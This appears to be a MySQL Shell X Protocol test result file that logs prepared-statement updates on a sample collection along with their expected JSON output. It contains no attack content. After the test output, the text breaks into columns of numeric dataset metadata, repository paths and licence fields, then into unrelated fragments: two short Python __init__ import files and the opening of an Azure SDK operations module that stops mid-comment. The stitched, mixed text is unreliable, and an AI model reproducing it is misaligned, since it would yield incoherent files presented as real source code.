stmt_id: 5
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 5
}
#@<OUT> second execution after array_insert(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after array_insert(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 5
}
#@<OUT> third execution after array_insert(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> array_append() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 5
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
#@<OUT> array_append() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after array_append(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 6
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 6
}
#@<OUT> second execution after array_append(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after array_append(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 6
}
#@<OUT> third execution after array_append(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> sort() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 6
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
#@<OUT> sort() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after sort(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 7
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 7
}
#@<OUT> second execution after sort(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after sort(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 7
}
#@<OUT> third execution after sort(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> limit() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 7
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
limit {
row_count: 2
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
}
#@<OUT> limit() changes statement, back to normal execution
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 2 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 2 items affected ([[*]] sec)
Rows matched: 3 Changed: 2 Warnings: 0
#@<PROTOCOL> second execution after limit(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 8
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
}
operation: ARRAY_APPEND
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "G"
}
}
}
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 0
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 8
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> second execution after limit(), prepares statement and executes it
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 2 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 2 items affected ([[*]] sec)
Rows matched: 3 Changed: 2 Warnings: 0
#@<PROTOCOL> third execution after limit(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 8
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> third execution after limit(), uses prepared statement
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 2 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F",
"G"
]
}
3 documents in set ([[*]] sec)
Query OK, 2 items affected ([[*]] sec)
Rows matched: 3 Changed: 2 Warnings: 0
#@<PROTOCOL> prepares statement to test no changes when reusing bind() and limit()
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
limit {
row_count: 1
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 19
}
}
}
args {
type: V_STRING
v_string {
value: "g%"
}
}
}
#@<OUT> prepares statement to test no changes when reusing bind() and limit()
Query OK, 1 item affected ([[*]] sec)
Rows matched: 1 Changed: 1 Warnings: 0
{
"_id": "001",
"age": 19,
"name": "george"
}
{
"_id": "002",
"age": 18,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
3 documents in set ([[*]] sec)
#@<PROTOCOL> Reusing statement with bind() using j%
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 9
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 19
}
}
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 1
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 9
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "j%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Reusing statement with bind() using j%
Query OK, 1 item affected ([[*]] sec)
Rows matched: 1 Changed: 1 Warnings: 0
{
"_id": "001",
"age": 19,
"name": "george"
}
{
"_id": "002",
"age": 19,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
3 documents in set ([[*]] sec)
#@<PROTOCOL> Reusing statement with new limit()
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 9
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> Reusing statement with new limit()
Query OK, 2 items affected ([[*]] sec)
Rows matched: 2 Changed: 0 Warnings: 0
{
"_id": "001",
"age": 19,
"name": "george"
}
{
"_id": "002",
"age": 19,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
3 documents in set ([[*]] sec)
| 18.305727
| 86
| 0.376442
| 5,180
| 62,331
| 4.407915
| 0.025097
| 0.055796
| 0.096177
| 0.117549
| 0.994963
| 0.992774
| 0.989664
| 0.975693
| 0.965751
| 0.936101
| 0
| 0.022645
| 0.510436
| 62,331
| 3,404
| 87
| 18.311105
| 0.72561
| 0.055911
| 0
| 0.707347
| 0
| 0
| 0.060842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
24f4a8589f1ef4afc068c245028a9f87934274cb
| 81
|
py
|
Python
|
kd_splicing/kd_splicing/location/__init__.py
|
konovalovdmitry/catsnap
|
d5f1d7c37dcee1ad3fee2cdc12a3b44b56f4c63f
|
[
"MIT"
] | null | null | null |
kd_splicing/kd_splicing/location/__init__.py
|
konovalovdmitry/catsnap
|
d5f1d7c37dcee1ad3fee2cdc12a3b44b56f4c63f
|
[
"MIT"
] | null | null | null |
kd_splicing/kd_splicing/location/__init__.py
|
konovalovdmitry/catsnap
|
d5f1d7c37dcee1ad3fee2cdc12a3b44b56f4c63f
|
[
"MIT"
] | 1
|
2021-09-30T08:06:20.000Z
|
2021-09-30T08:06:20.000Z
|
from kd_splicing.location.models import *
from kd_splicing.location import utils
| 27
| 41
| 0.851852
| 12
| 81
| 5.583333
| 0.583333
| 0.179104
| 0.41791
| 0.656716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 42
| 40.5
| 0.917808
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7071f6303070a666e640ba6e39abe632b13a815e
| 145
|
py
|
Python
|
src/handlers/special/__init__.py
|
Alex-T13/stc_13-whithout-django-old
|
2cbd3d84b8c602d103ee60abcd68cdec33f88482
|
[
"MIT"
] | null | null | null |
src/handlers/special/__init__.py
|
Alex-T13/stc_13-whithout-django-old
|
2cbd3d84b8c602d103ee60abcd68cdec33f88482
|
[
"MIT"
] | null | null | null |
src/handlers/special/__init__.py
|
Alex-T13/stc_13-whithout-django-old
|
2cbd3d84b8c602d103ee60abcd68cdec33f88482
|
[
"MIT"
] | null | null | null |
from .handlers_4xx import handle_404
from .handlers_4xx import handle_405
from .handlers_5xx import handle_500
from .static import handle_static
| 29
| 36
| 0.862069
| 23
| 145
| 5.130435
| 0.434783
| 0.40678
| 0.254237
| 0.355932
| 0.457627
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.110345
| 145
| 4
| 37
| 36.25
| 0.821705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
562e3563b5a863f53eab772993ed732b774f84a0
| 21,486
|
py
|
Python
|
sdk/workloadmonitor/azure-mgmt-workloadmonitor/azure/mgmt/workloadmonitor/operations/_monitors_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/workloadmonitor/azure-mgmt-workloadmonitor/azure/mgmt/workloadmonitor/operations/_monitors_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/workloadmonitor/azure-mgmt-workloadmonitor/azure/mgmt/workloadmonitor/operations/_monitors_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar

    T = TypeVar('T')
    # Signature of the optional `cls` callback that callers may pass via kwargs:
    # it receives the raw pipeline response, the deserialized body, and the
